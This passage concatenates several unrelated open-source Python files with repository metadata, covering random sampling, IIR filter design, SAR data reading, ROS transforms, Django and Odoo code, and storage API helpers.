print("Number of students enrolled in the UK: ", total_students)
"""
normalized_enrollments = [students / total_students for students in enrollments]
print(weighted_choice(universities, normalized_enrollments))
outcomes=[]
n= 100000
for i in range(n):
outcomes.append(weighted_choice(universities,normalized_enrollments))
c = Counter(outcomes)
pprint(c.most_common(20),indent=2, width=70)
print('-------------Aufgabe 3-------------')
def find_interval(x,
partition,
endpoints=True):
""" find_interval -> i
    If endpoints is True, "i" will be the index for which
    partition[i] < x < partition[i+1] holds, if such an index exists;
    -1 otherwise.
    If endpoints is False, "i" will be the smallest index
    for which x < partition[i] holds. If no such index exists,
"i" will be set to len(partition)
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1 if endpoints else i
return -1 if endpoints else len(partition)
def weighted_choice(sequence, weights):
"""
weighted_choice selects a random element of
the sequence according to the list of weights
"""
x = np.random.random()
cum_weights = [0] + list(np.cumsum(weights))
index = find_interval(x, cum_weights)
return sequence[index]
def cartesian_choice(*iterables):
"""
A list with random choices from each iterable of iterables
is being created in respective order.
The result list can be seen as an element of the
Cartesian product of the iterables
"""
res = []
for population in iterables:
res.append(random.choice(population))
return res
def weighted_cartesian_choice(*iterables):
"""
A list with weighted random choices from each iterable of iterables
is being created in respective order
"""
res = []
for population, weights in iterables:
lst = weighted_choice(population, weights)
res.append(lst)
return res
def weighted_sample(population, weights, k):
"""
This function draws a random sample of length k
from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
        choice = weighted_choice(population, weights)  # draw one weighted element
sample.add(choice)
index = population.index(choice)
weights.pop(index)
population.remove(choice)
weights = [ x / sum(weights) for x in weights]
return list(sample)
def weighted_sample_alternative(population, weights, k):
"""
Alternative way to previous implementation.
This function draws a random sample of length k
from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
        choice = weighted_choice(population, weights)  # draw one weighted element
if choice not in sample:
sample.add(choice)
return list(sample)
amazons = ["Airla","Barbara","Eos",
"Glykeria","Hanna","Helen",
"Agathangelos","Iokaste","Medousa",
"Sofronia","Andromeda"]
weights = np.full(11,1/len(amazons))
Pytheusses_favorites = {"Iokaste","Medousa","Sofronia","Andromeda"}
n = 1000
counter = 0
prob= 1 / 330
days = 0
factor1 = 1 / 13
factor2 = 1 / 12
start = time.perf_counter()
while prob < 0.9:
for i in range(n):
the_chosen_ones = weighted_sample_alternative(amazons, weights, 4)
if set(the_chosen_ones) == Pytheusses_favorites:
counter += 1
prob = counter / n
counter = 0
weights[:7] = weights[:7] - weights[:7] * factor1
weights[7:] = weights[7:] + weights[7:] * factor2
weights = weights / np.sum(weights)
#print(weights)
days += 1
print(time.perf_counter() - start)
print("Number of days, he has to wait: ", days)
avg_line_length: 29.5625 | max_line_length: 83 | alphanum_fraction: 0.643031 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 2,192 | score_documentation: 0.356481
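
The `weighted_choice` pattern above (a uniform draw located inside a cumulative-weight partition) can be sanity-checked in isolation. This sketch uses `np.searchsorted` instead of the file's linear `find_interval`; the sequence and weights are illustrative:

```python
import numpy as np

rng = np.random.default_rng(0)
sequence = ["a", "b", "c"]
weights = [0.2, 0.3, 0.5]

# Locate each uniform draw in the cumulative partition [0.2, 0.5, 1.0]:
# draws below 0.2 pick "a", 0.2..0.5 pick "b", the rest pick "c".
cum = np.cumsum(weights)
draws = [sequence[int(np.searchsorted(cum, rng.random(), side="right"))]
         for _ in range(10_000)]
print({x: draws.count(x) / len(draws) for x in sequence})
# expected to land near {'a': 0.2, 'b': 0.3, 'c': 0.5}
```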

hexsha: 0ce58d7de1508c5e2496368e37a432c416830c42 | size: 2,183 | ext: py | lang: Python
max_stars file: lib_dsp/iir/iir/design/iir.py | repo: PyGears/lib-dsp | head: a4c80882f5188799233dc9108f91faa4bab0ac57 | licenses: ["MIT"] | stars: 3 (2019-08-26T17:32:33.000Z to 2022-03-19T02:05:02.000Z)
max_issues file: pygears_dsp/lib/iir.py | repo: bogdanvuk/pygears-dsp | head: ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | licenses: ["MIT"] | issues: null
max_forks file: pygears_dsp/lib/iir.py | repo: bogdanvuk/pygears-dsp | head: ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | licenses: ["MIT"] | forks: 5 (2019-09-18T18:00:13.000Z to 2022-03-28T11:07:26.000Z)
content:
from pygears import gear, Intf
from pygears.lib import dreg, decouple, saturate, qround
@gear
def iir_1dsos(din, *, a, b, gain):
# add input gain and init delayed inputs
zu0 = din * gain
zu1 = zu0 | dreg(init=0)
zu2 = zu1 | dreg(init=0)
# perform b coefficient sum
a1 = (zu1 * b[1]) + (zu2 * b[2])
a2 = a1 + (zu0 * b[0])
# declare output interface and its type
y = Intf(a2.dtype)
# init delayed outputs
zy1 = y | decouple(init=0)
zy2 = zy1 | dreg(init=0)
# perform a coefficient sum
b1 = (zy2 * a[2]) + (zy1 * a[1])
# add both sums and set output
y |= (a2 - b1) | qround(fract=a2.dtype.fract) | saturate(t=a2.dtype)
return y
@gear
def iir_2tsos(din, *, a, b, gain):
# add input gain
x = din * gain
# declare output interface and its type
y = Intf(din.dtype)
# perform first tap multiplication and sum
z0 = ((x * b[2]) - (y * a[2]))
# delay first sum output
z0_delayed = z0 | dreg(init=0)
# perform second tap multiplication and sum
z1 = ((x * b[1]) + z0_delayed - (y * a[1]))
# delay second sum output
z1_delayed = z1 | decouple(init=0)
# perform final sum and set output
y |= ((x * b[0]) + z1_delayed) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return y
@gear
def iir_df1dsos(din, *, a, b, gain, ogain):
# init temp
temp = din
# add cascades for all b coefficients
for i in range(len(b)):
# format every cascaded output as input
temp = temp | iir_1dsos(a=a[i], b=b[i], gain=gain[i]) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
# add output gain and format as input
dout = (temp * ogain) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return dout
@gear
def iir_df2tsos(din, *, a, b, gain, ogain):
# init temp
temp = din
# add cascades for all b coefficients
for i in range(len(b)):
# format every cascaded output as input
temp = temp | iir_2tsos(a=a[i], b=b[i], gain=gain[i])
# add output gain and format as input
dout = (temp * ogain) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return dout
avg_line_length: 24.255556 | max_line_length: 117 | alphanum_fraction: 0.601466 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 2,083 | score_decorators: 0.954191 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 656 | score_documentation: 0.300504

hexsha: 0ce5cb9e4bc10393a6546a397038a2d745082f63 | size: 3,752 | ext: py | lang: Python
file: read_iceye_h5.py | repo: eciraci/iceye_gamma_proc | head: 68b04bfd55082862f419031c28e7b52f1800f3db | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
#!/usr/bin/env python
u"""
read_iceye_h5.py
Written by Enrico Ciraci' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
  --slc SLC, -C SLC     Process a single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
def main():
parser = argparse.ArgumentParser(
description="""TEST: Read ICEye Single Look Complex and Parameter."""
)
# - Absolute Path to directory containing input data.
default_dir = os.path.join(os.path.expanduser('~'), 'Desktop',
'iceye_gamma_test')
parser.add_argument('--directory', '-D',
type=lambda p: os.path.abspath(os.path.expanduser(p)),
default=default_dir,
help='Project data directory.')
    parser.add_argument('--slc', '-C', type=str,
                        default=None, help='Process a single SLC.')
args = parser.parse_args()
# - Path to Test directory
data_dir = os.path.join(args.directory, 'input')
# - create output directory
out_dir = make_dir(args.directory, 'output')
out_dir = make_dir(out_dir, 'slc+par')
# - ICEye Suffix
ieye_suff = 'ICEYE_X7_SLC_SM_'
if args.slc is not None:
# - Process a single SLC
b_input = os.path.join(data_dir, args.slc)
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.slc')))
par_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.par')))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
else:
        # - Process the entire input directory content
# - List Directory Content
data_dir_list = [os.path.join(data_dir, x) for x in os.listdir(data_dir)
if x.endswith('.h5')]
for b_input in tqdm(data_dir_list, total=len(data_dir_list), ncols=60):
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir, b_input_name.replace('.h5', '.slc'))
par_name = os.path.join(out_dir, b_input_name.replace('.h5', '.par'))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
# - run main program
if __name__ == '__main__':
start_time = datetime.datetime.now()
main()
end_time = datetime.datetime.now()
print(f"# - Computation Time: {end_time - start_time}")
avg_line_length: 36.076923 | max_line_length: 81 | alphanum_fraction: 0.63033 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,848 | score_documentation: 0.492537

hexsha: 0ce5d95f10a05417cb3b6fc154c24d7adc27cf45 | size: 1,877 | ext: py | lang: Python
file: scripts/baxter_find_tf.py | repo: mkrizmancic/qlearn_baxter | head: 0498315212cacb40334cbb97a858c6ba317f52a3 | licenses: ["MIT"]
stars: 4 (2017-11-11T18:16:22.000Z to 2018-11-08T13:31:09.000Z) | issues: null | forks: 2 (2019-09-04T12:28:58.000Z to 2021-09-27T13:02:48.000Z)
content:
#!/usr/bin/env python
"""Calculate transformation matrices and broadcast transform from robot's base to head markers."""
import rospy
import tf
import math
from PyKDL import Vector, Frame, Rotation
if __name__ == '__main__':
rospy.init_node('baxter_find_transformation')
listener = tf.TransformListener()
br = tf.TransformBroadcaster()
rate = rospy.Rate(50)
while not rospy.is_shutdown():
try:
(trans_OH, rot_OH) = listener.lookupTransform('/optitrack', '/bax_head', rospy.Time(0))
(trans_OA, rot_OA) = listener.lookupTransform('/optitrack', '/bax_arm', rospy.Time(0))
(trans_BG, rot_BG) = listener.lookupTransform('/base', '/left_gripper_base', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
# Rotations
rot_OH = Rotation.Quaternion(*rot_OH)
rot_OA = Rotation.Quaternion(*rot_OA)
rot_BG = Rotation.Quaternion(*rot_BG)
rot_AG = Rotation.RPY(math.pi / 2, -math.pi, math.pi / 2)
# Creating Frames
T_OH = Frame(rot_OH, Vector(*trans_OH))
T_OA = Frame(rot_OA, Vector(*trans_OA))
T_BG = Frame(rot_BG, Vector(*trans_BG))
T_AG = Frame(rot_AG, Vector(0, 0, 0))
# Finding right transformation
T_HB = T_OH.Inverse() * T_OA * T_AG * T_BG.Inverse()
T_empty_p = Vector(0, 0, 0)
T_empty_Q = Rotation.Quaternion(0, 0, 0, 1)
T_empty = Frame(T_empty_Q, T_empty_p)
# Broadcast new transformations
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'base', 'bax_head')
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'reference/base', 'bax_head')
br.sendTransform(T_empty.p, T_empty.M.GetQuaternion(), rospy.Time.now(), 'world', 'base')
rate.sleep()
avg_line_length: 39.93617 | max_line_length: 104 | alphanum_fraction: 0.64731 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 373 | score_documentation: 0.198721

hexsha: 0ce7201689d9142cf85fb513dc2bf55a86b13523 | size: 475 | ext: py | lang: Python
file: car/migrations/0004_sale_cc.py | repo: jobkarani/carnect | head: 8675d025e56fc07439b88e873e72a21cbbe747a9 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
# Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('car', '0003_auto_20220110_1507'),
]
operations = [
migrations.AddField(
model_name='sale',
name='cc',
field=models.CharField(default=django.utils.timezone.now, max_length=100),
preserve_default=False,
),
]
avg_line_length: 22.619048 | max_line_length: 86 | alphanum_fraction: 0.621053 | count_classes: 353 | score_classes: 0.743158 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 87 | score_documentation: 0.183158

hexsha: 0ce7e95642a1dd2c0010de92c604aaf0452e7669 | size: 509 | ext: py | lang: Python
file: src/prepare_data/task_prepare_r_effective_by_rki.py | repo: covid-19-impact-lab/sid-germany | head: aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | licenses: ["MIT"]
stars: 4 (2021-04-24T14:43:47.000Z to 2021-07-03T14:05:21.000Z) | issues: 4 (2021-04-27T10:34:45.000Z to 2021-08-31T16:40:28.000Z) | forks: null
content:
import pandas as pd
import pytask
from src.config import BLD
@pytask.mark.depends_on(BLD / "data" / "raw_time_series" / "reproduction_number.csv")
@pytask.mark.produces(BLD / "data" / "processed_time_series" / "r_effective.pkl")
def task_prepare_rki_r_effective_data(depends_on, produces):
df = pd.read_csv(depends_on)
df["date"] = pd.to_datetime(df["Datum"], yearfirst=True)
df = df.set_index("date").sort_index()
r_effective = df["PS_7_Tage_R_Wert"]
r_effective.to_pickle(produces)
avg_line_length: 29.941176 | max_line_length: 85 | alphanum_fraction: 0.732809 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 444 | score_decorators: 0.872299 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 131 | score_documentation: 0.257367

hexsha: 0ce87ae6e8e21068ebe0de253baf4eb583ece22f | size: 701 | ext: py | lang: Python
file: conv.py | repo: aenco9/HCAP2021 | head: d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
import numpy as np
def convolucion(Ioriginal, kernel):
    '''Method that performs a convolution on an image
    Input:
        Ioriginal - original image as a matrix
        kernel - kernel to sweep across the image
    Output:
        res - resulting image'''
    # fr - rows, cr - columns
    fr = len(Ioriginal)-(len(kernel)-1)
    cr = len(Ioriginal[0])-(len(kernel[0])-1)
    res = np.zeros((fr, cr))
    # rows, result matrix
    for i in range(len(res)):
        # columns, result matrix
        for j in range(len(res[0])):
            suma = 0
            # rows, kernel
            for m in range(len(kernel)):
                # columns, kernel
                for n in range(len(kernel[0])):
                    suma += kernel[m][n] * Ioriginal[m+i][n+j]
            res[i][j] = suma
    return res
avg_line_length: 26.961538 | max_line_length: 61 | alphanum_fraction: 0.664765 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 308 | score_documentation: 0.436261
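
A quick check of `convolucion` above: with a 3x3 input and a 2x2 all-ones kernel, the "valid" output is 2x2 and each cell is the sum of the window it covers (input values chosen only for illustration):

```python
import numpy as np  # convolucion above needs numpy for np.zeros

image = [[1, 2, 3],
         [4, 5, 6],
         [7, 8, 9]]
kernel = [[1, 1],
          [1, 1]]

print(convolucion(image, kernel))
# [[12. 16.]
#  [24. 28.]]   e.g. 12 = 1 + 2 + 4 + 5
```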

hexsha: 0ce8bde6ed2f1bdf025074aeab207999685d2edc | size: 1,124 | ext: py | lang: Python
file: setup.py | repo: viatoriche/vtr_utils | head: d877a97eabf57246cd73e975da5c56d6a343bba4 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
import os
from distutils.core import setup
from setuptools import find_packages
package = 'vtr_utils'
version = "0.1.0"
packages = find_packages()
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
setup(
name=package,
version=version,
packages=packages,
package_data=get_package_data(package),
license='MIT',
author='viatoriche',
author_email='maxim@via-net.org',
description='Small utilities',
url='https://github.com/viatoriche/vtr_utils',
download_url='https://github.com/viatoriche/vtr_utils/tarball/{}'.format(version),
install_requires=['addict', 'pytz', 'six', 'pyunpack', 'patool'],
)
avg_line_length: 28.820513 | max_line_length: 86 | alphanum_fraction: 0.662811 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 314 | score_documentation: 0.279359

hexsha: 0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2 | size: 2,925 | ext: py | lang: Python
file: radical_translations/agents/tests/test_models.py | repo: kingsdigitallab/radical_translations | head: c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | licenses: ["MIT"]
stars: 3 (2022-02-08T18:03:44.000Z to 2022-03-18T18:10:43.000Z) | issues: 19 (2020-05-11T15:36:35.000Z to 2022-02-08T11:26:40.000Z) | forks: null
content:
from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
@pytest.mark.usefixtures("vocabulary")
class TestOrganisation:
def test_agent_type(self, title):
obj = Person(name="person name")
obj.save()
assert obj.agent_type == "person"
obj = Organisation(name="organisation name")
obj.save()
assert obj.agent_type == "organisation"
def test_from_gsx_entry(self):
assert Organisation.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$organisation"]["$t"] = ""
assert Organisation.from_gsx_entry(entry) is None
entry["gsx$organisation"]["$t"] = "Organisation 1"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$type"]["$t"] = "Publisher"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$location"]["$t"] = "0001: London [UK]"
assert Organisation.from_gsx_entry(entry) is not None
assert Organisation.objects.count() == 1
@pytest.mark.usefixtures("vocabulary")
class TestPerson:
def test_from_gsx_entry(self):
assert Person.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$name"]["$t"] = ""
assert Person.from_gsx_entry(entry) is None
entry["gsx$name"]["$t"] = "Person 1"
assert Person.from_gsx_entry(entry) is not None
entry["gsx$gender"]["$t"] = "f"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.gender == "f"
entry["gsx$birth"]["$t"] = "1790"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.date_birth.date_display == "1790"
entry["gsx$locationsresidence"]["$t"] = "0001: London [UK]; 0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.based_near.first().address
assert "Paris" in p.based_near.last().address
entry["gsx$locationbirth"]["$t"] = "0001: London [UK]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.place_birth.address
entry["gsx$locationdeath"]["$t"] = "0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "Paris" in p.place_death.address
entry["gsx$occupations"]["$t"] = "tester"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "tester" in p.roles.first().label.lower()
entry["gsx$organisations"]["$t"] = "Organisation 1"
p = Person.from_gsx_entry(entry)
assert p is not None
entry["gsx$collaborators"]["$t"] = "Person 2; Person 3"
p = Person.from_gsx_entry(entry)
assert p is not None
assert Person.objects.count() == 3
avg_line_length: 31.793478 | max_line_length: 85 | alphanum_fraction: 0.624274 | count_classes: 2,685 | score_classes: 0.917949 | count_generators: 0 | score_generators: 0 | count_decorators: 2,763 | score_decorators: 0.944615 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 588 | score_documentation: 0.201026

hexsha: 0ce95b5923e81e3d937258cb29b18f328d097198 | size: 1,557 | ext: py | lang: Python
file: addons/website_sale_coupon/controllers/main.py | repo: SHIVJITH/Odoo_Machine_Test | head: 310497a9872db7844b521e6dab5f7a9f61d365a4 | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null
content:
# -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo.http import request
class WebsiteSale(WebsiteSale):
@http.route(['/shop/pricelist'])
def pricelist(self, promo, **post):
order = request.website.sale_get_order()
coupon_status = request.env['sale.coupon.apply.code'].sudo().apply_coupon(order, promo)
if coupon_status.get('not_found'):
return super(WebsiteSale, self).pricelist(promo, **post)
elif coupon_status.get('error'):
request.session['error_promo_code'] = coupon_status['error']
return request.redirect(post.get('r', '/shop/cart'))
@http.route(['/shop/payment'], type='http', auth="public", website=True)
def payment(self, **post):
order = request.website.sale_get_order()
order.recompute_coupon_lines()
return super(WebsiteSale, self).payment(**post)
@http.route(['/shop/cart'], type='http', auth="public", website=True)
def cart(self, access_token=None, revive='', **post):
order = request.website.sale_get_order()
order.recompute_coupon_lines()
return super(WebsiteSale, self).cart(access_token=access_token, revive=revive, **post)
# Override
# Add in the rendering the free_shipping_line
def _get_shop_payment_values(self, order, **kwargs):
values = super(WebsiteSale, self)._get_shop_payment_values(order, **kwargs)
values['free_shipping_lines'] = order._get_free_shipping_lines()
return values
avg_line_length: 42.081081 | max_line_length: 95 | alphanum_fraction: 0.680154 | count_classes: 1,412 | score_classes: 0.906872 | count_generators: 0 | score_generators: 0 | count_decorators: 1,061 | score_decorators: 0.681439 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 255 | score_documentation: 0.163776

hexsha: 0ce9ddf8982fdd13b64038e356850186f884758e | size: 4,462 | ext: py | lang: Python
file: go/apps/http_api/tests/test_views.py | repo: lynnUg/vumi-go | head: 852f906c46d5d26940bd6699f11488b73bbc3742 | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
content:
from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
class TestHttpApiViews(GoDjangoTestCase):
def setUp(self):
self.app_helper = self.add_helper(AppViewsHelper(u'http_api'))
self.client = self.app_helper.get_client()
def test_show_stopped(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv")
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_show_running(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv", started=True)
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_edit_view(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': 'http://events/',
'http_api-metric_store': 'foo_metric_store',
}, follow=True)
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': 'http://events/',
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
def test_edit_view_no_event_url(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'http://messages/')
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
def test_edit_view_no_push_urls(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': '',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': None,
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
avg_line_length: 40.93578 | max_line_length: 72 | alphanum_fraction: 0.61385 | count_classes: 4,354 | score_classes: 0.975796 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,139 | score_documentation: 0.255267

hexsha: 0ceb15471ca6941f1a3c2803a1bcd3575ac7f39e | size: 5,306 | ext: py | lang: Python
file: PyPowerStore/utils/helpers.py | repo: dell/python-powerstore | head: 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | licenses: ["Apache-2.0"]
stars: 15 (2020-05-06T23:46:44.000Z to 2021-12-14T08:04:48.000Z) | issues: 2 (2020-06-09T15:19:25.000Z to 2020-08-18T18:58:59.000Z) | forks: 5 (2020-05-06T23:46:22.000Z to 2021-05-08T03:03:07.000Z)
content:
# -*- coding: utf-8 -*-
# Copyright: (c) 2019-2021, Dell EMC
"""Helper module for PowerStore"""
import logging
from pkg_resources import parse_version
provisioning_obj = None
def set_provisioning_obj(val):
global provisioning_obj
provisioning_obj = val
def prepare_querystring(*query_arguments, **kw_query_arguments):
"""Prepare a querystring dict containing all query_arguments and
kw_query_arguments passed.
:return: Querystring dict.
:rtype: dict
"""
querystring = dict()
for argument_dict in query_arguments:
if isinstance(argument_dict, dict):
querystring.update(argument_dict)
querystring.update(kw_query_arguments)
return querystring
def get_logger(module_name, enable_log=False):
"""Return a logger with the specified name
:param module_name: Name of the module
:type module_name: str
:param enable_log: (optional) Whether to enable log or not
:type enable_log: bool
:return: Logger object
:rtype: logging.Logger
"""
LOG = logging.getLogger(module_name)
LOG.setLevel(logging.DEBUG)
if enable_log:
LOG.disabled = False
else:
LOG.disabled = True
return LOG
def is_foot_hill_or_higher():
"""Return a true if the array version is foot hill or higher.
:return: True if foot hill or higher
:rtype: bool
"""
foot_hill_version = '2.0.0.0'
array_version = provisioning_obj.get_array_version()
if array_version and (
parse_version(array_version) >= parse_version(foot_hill_version)):
return True
return False
def filtered_details(filterable_keys, filter_dict, resource_list,
resource_name):
"""
Get the filtered output.
:filterable_keys: Keys on which filters are supported.
:type filterable_keys: list
:filter_dict: Dict containing the filters, operators and value.
:type filter_dict: dict
:resource_list: The response of the REST api call on which
filter_dict is to be applied.
:type resource_list: list
:resource_name: Name of the resource
:type resource_name: str
:return: Dict, containing filtered values.
:rtype: dict
"""
err_msg = "Entered key {0} is not supported for filtering. " \
"For {1}, filters can be applied only on {2}. "
response = list()
for resource in resource_list:
count = 0
for key in filter_dict:
# Check if the filters can be applied on the key or not
if key not in filterable_keys:
raise Exception(err_msg.format(
key, resource_name, str(filterable_keys)))
count = apply_operators(filter_dict, key, resource, count)
if count == len(filter_dict):
temp_dict = dict()
temp_dict['id'] = resource['id']
# check if resource has 'name' parameter or not.
if resource_name not in ["CHAP config", "service config"]:
temp_dict['name'] = resource['name']
response.append(temp_dict)
return response
def apply_operators(filter_dict, key, resource, count):
"""
Returns the count for the filters applied on the keys
"""
split_list = filter_dict[key].split(".")
if split_list[0] == 'eq' and str(resource[key]) == str(split_list[1]):
count += 1
elif split_list[0] == 'neq' and str(resource[key]) != str(split_list[1]):
count += 1
elif split_list[0] == 'ilike':
if not isinstance(resource[key], str):
            raise Exception("'ilike' can be applied on string type"
                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
search_val = split_list[1].replace("*", "")
value = resource[key]
if split_list[1].startswith("*") and \
split_list[1].endswith("*") and \
value.count(search_val) > 0:
count += 1
elif split_list[1].startswith("*") and \
value.endswith(search_val):
count += 1
elif value.startswith(search_val):
count += 1
elif split_list[0] == 'gt':
if not isinstance(resource[key], (int, float)):
            raise Exception("'gt' can be applied on numeric (int/float)"
                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) < resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) < resource[key]:
count += 1
elif split_list[0] == 'lt':
if not isinstance(resource[key], (int, float)):
            raise Exception("'lt' can be applied on numeric (int/float)"
